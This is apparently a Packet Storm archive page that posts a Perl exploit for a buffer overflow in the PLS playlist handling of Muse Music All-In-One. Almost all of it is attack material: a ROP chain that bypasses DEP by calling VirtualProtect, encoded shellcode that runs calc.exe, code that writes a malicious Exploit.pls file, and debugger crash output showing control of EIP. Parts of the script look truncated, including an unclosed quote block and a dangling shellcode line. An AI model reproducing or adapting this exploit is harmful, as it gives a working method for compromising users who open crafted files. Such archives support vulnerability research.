what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Muse Music All-In-One PLS Buffer Overflow

Muse Music All-In-One PLS Buffer Overflow
Posted Sep 26, 2011
Authored by C4SS!0 G0M3S

Muse Music All-In-One version PLS file buffer overflow exploit with DEP bypass.

tags | exploit, overflow
SHA-256 | 81d4a367229cb243e631bb2b737374d8133a968bdd78c62a56e44a7a1569c9f4

Muse Music All-In-One PLS Buffer Overflow

Change Mirror Download
#[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit(DEP Bypass)
#[+]Date: 25\09\2011(DD\MM\YYYY)
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#This exploit can be universal, if the buffer to overwrite EIP stay for all Windows systems equal. ;)
#To reproduce click in File -> Open... -> Select Exploit.pls and see the Calc.

use strict;
use warnings;

print q{

Created By C4SS!0 G0M3S
E-mail netfuzzer@hotmail.com
Blog net-fuzzer.blogspot.com
print "\n\t\t[+]Creating Exploit File...\n";

##########################ROP START HERE###############################################
my $rop = pack('V',0x0043bc93); # POP EAX # RETN
$rop .= "AAAA" x 4; # JUNK
$rop .= pack('V',0x00339014); # PTR to a Call DWORD for LoadLibraryA
$rop .= pack('V',0x1002042f); # POP EBP # RETN
$rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of LoadLibraryA
$rop .= pack('V',0x100255d1); # POP ESI # RETN
$rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == LoadLibraryA
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x004a296c); # RETN
$rop .= pack('V',0x004b0519); # PUSHAD # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 35; # JUNK
#############################Call GetProcAddress###################################
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x100255d1); # POP ESI # RETN
$rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of GetProcAddress
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x004b9563); # XCHG EAX,EBP # RETN
$rop .= pack('V',0x0043bc93); # POP EAX # RETN
$rop .= pack('V',0x00339010); # PTR to GetProcAddress
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress
$rop .= pack('V',0x004b0519); # PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "A" x 33; # JUNK
#############################Call VirtualProtect####################################
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x00432a42); # PUSH ESP # POP EDI # XOR EAX,EAX # POP ESI # RETN 08
$rop .= "VVVV"; # JUNK
$rop .= pack('V',0x004a296c) x 3; # RETN
$rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN
$rop .= pack('V',0x0043bc93); # POP EAX # RETN
$rop .= pack('V',0x00000040); # Value of flNewProtect
$rop .= pack('V',0x00478695); # XCHG EAX,EDX # RETN
$rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN
$rop .= pack('V',0x1001433f); # ADD EAX,EDI # POP EDI # POP ESI # RETN
$rop .= "A" x 8; # JUNK
$rop .= pack('V',0x1002028b); # POP ECX # RETN
$rop .= "\x00\x00\x00\x00";
$rop .= pack('V',0x1000B6ED); # ADD ECX,EAX # MOV DWORD PTR DS:[10085B38],ECX # RETN
$rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN
$rop .= pack('V',0x1002042f); # POP EBP # RETN
$rop .= pack('V',0x10012107); # PUSH ESP # RETN == Return of VirtualProtect
$rop .= pack('V',0x004a05b8); # POP EBX # RETN
$rop .= pack('V',0x00000500); # Value of dwSize
$rop .= pack('V',0x004b2c56); # XCHG EAX,ESI # RETN
$rop .= pack('V',0x004a296b); # POP EDI # RETN
$rop .= pack('V',0x004a296c); # RETN
$rop .= pack('V',0x004b0519); # PUSHAD # RETN
##########################ROP END HERE#################################################
my $shellcode =
"\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" .
"\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" .
"\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" .
"\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" .
"\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" .
"\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" .
"\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe"
"\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff"
"\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" .
"\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" .
"\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" .
"\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" .
"\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" .
"\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" .
my $buf = "A" x 1300;
$buf .= $rop;
$buf .= "\x90" x 10;
$buf .= $shellcode;
$buf .= "A" x 2000;

open(my $file,">Exploit.pls") or die "[-]Error: $!\n";
print $file $buf;
close $file;
print "\t\t[+]File Exploit.pls Created Successfully.\n";
(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=0000007b ecx=ffffffff edx=00000002 esi=00130000 edi=77c3fce0
eip=77c24609 esp=0012ea1c ebp=0012ec34 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
77c24609 8806 mov byte ptr [esi],al ds:0023:00130000=41
0:000> .exr -1
ExceptionAddress: 77c24609 (msvcrt!wscanf+0x00002343)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00130000
Attempt to write to address 00130000
0:000> .lastevent
Last event: 8f4.8f8: Access violation - code c0000005 (first chance)
debugger time: Sun Sep 25 19:22:13.937 2011 (UTC - 3:00)
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ec34 77c212df msvcrt!wscanf+0x2343
*** WARNING: Unable to verify checksum for Muse.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Muse.exe -
0012ec70 00498d3a msvcrt!fscanf+0x28
0012eca4 7c91a3cb Muse!CSdll::operator=+0x974fa
0012ecb8 7c91a351 ntdll!RtlpUnWaitCriticalSection+0x86c
00000000 00000000 ntdll!RtlpUnWaitCriticalSection+0x7f2
0:000> g
(8f4.8f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012e64c ebp=0012e66c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ?? ???
0:000> !load winext/msec.dll
0:000> !exploitable -v
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x41414141
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Exception Hash (Major/Minor): 0x71174239.0x2a6b1069

Stack Trace:
Instruction Address: 0x0000000041414141

Description: Read Access Violation at the Instruction Pointer
Short Description: ReadAVonIP
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlConvertUlongToLargeInteger+0x000000000000006a (Hash=0x71174239.0x2a6b1069)

Access violations at the instruction pointer are exploitable if not near NULL.

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    13 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    27 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By